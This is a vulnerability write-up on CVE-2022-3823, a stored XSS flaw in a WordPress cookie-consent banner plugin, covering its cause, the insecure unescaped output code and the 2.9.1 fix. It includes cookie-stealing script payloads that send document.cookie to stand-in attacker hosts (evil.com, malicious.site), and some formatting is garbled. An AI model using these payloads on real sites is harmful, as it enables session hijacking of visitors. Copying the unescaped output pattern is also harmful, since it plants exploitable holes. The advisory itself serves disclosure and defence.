CVE-2022-3823 concerns a vulnerability in the popular WordPress plugin, "The Beautiful Cookie Consent Banner," which affected all versions before 2.9.1. This bug allowed administrators—even those on restricted “unfiltered_html”-disallowed multisite setups—to inject persistent (Stored) Cross-Site Scripting (XSS) payloads into WordPress sites. In this deep dive, you’ll learn how this vulnerability works, see sample code, and find references for further reading.

This plugin helps websites display stylish banners to comply with cookie regulations (GDPR, CCPA, etc.). It lets admins configure banners via the WordPress admin dashboard. As of its vulnerable versions, it had more than 40,000 active installs.

- WordPress Plugin Page
- Plugin Changelog

The Vulnerability: CVE-2022-3823 in Plain English

Stored XSS occurs when a malicious script is saved to a website’s database (in this case, via plugin settings), and then executed in the browser of anyone viewing the affected page.

In this flaw, the plugin didn’t sanitize and escape some of its settings before storing them in the database and rendering them in the frontend. Even if the unfiltered_html WordPress capability was restricted (which is common on multisite setups), a privileged user—like an admin—could still inject malicious JavaScript.

Why Does It Matter?

- Attackers can run JavaScript on every visitor’s browser. Possible consequences: session hijacking, malicious redirects, stealing of cookies, etc.

Vulnerability Details

According to the disclosure (Ref: WPScan #11517), some settings (like banner text, button text, etc.) were not validated or escaped.

Let’s say the admin sets the ‘Banner Text’ to this

<script>alert('XSS! Cookie consent pwned!')</script>

After saving, every visitor will see that alert—*and a real attacker can use any JS they want*.

How It Looks in Settings

![](https://i.imgur.com/kHtPlFx.png)  
*Fig: Setting malicious script in the banner text via plugin settings page.*

Let’s exploit CVE-2022-3823 on a test site

1. Log in as any user with permission to edit cookie banner settings (e.g., as a site admin on multisite, or regular admin).

`html

fetch("<a href="https://evil.com/steal?cookie="+document.cookie" rel="nofollow">https://evil.com/steal?cookie="+document.cookie</a>)

Why Isn't This Blocked by unfiltered_html?

WordPress restricts HTML in content by default for certain users. But here, the plugin developers failed to use built-in sanitization functions like wp_kses_post() or esc_html(). So, the plugin trusted input too much.

1. Enter payload in plugin admin console

<script>new Image().src='https://malicious.site/?steal='+document.cookie</script>;

2. The vulnerable plugin saves it and later renders

// Insecure display in plugin template
echo get_option('cookie_banner_message'); // no escaping!

*With no escaping, the <script> tag runs on every page where the banner shows up.*

How Was It Fixed?

After report, version 2.9.1 added proper sanitization and escaping, following WordPress standards:

Sanitized user input in admin before save.

Changelog for v2.9.1

References & Sources

- WPScan Advisory #11517
- NVD entry CVE-2022-3823
- Plugin Changelog
- WordPress official docs: Sanitizing user input

Closing Advice

If you run a WordPress site using "The Beautiful Cookie Consent Banner" plugin, upgrade to 2.9.1+ immediately. If you run a multisite, scrutinize all plugins for similar improper sanitization patterns.

Remember: Plugins letting admins insert HTML or JS must always sanitize and escape. Don’t assume admin=trusted; on larger sites, that trust may be misplaced.

Timeline

Published on: 11/28/2022 14:15:00 UTC
Last modified on: 11/30/2022 03:46:00 UTC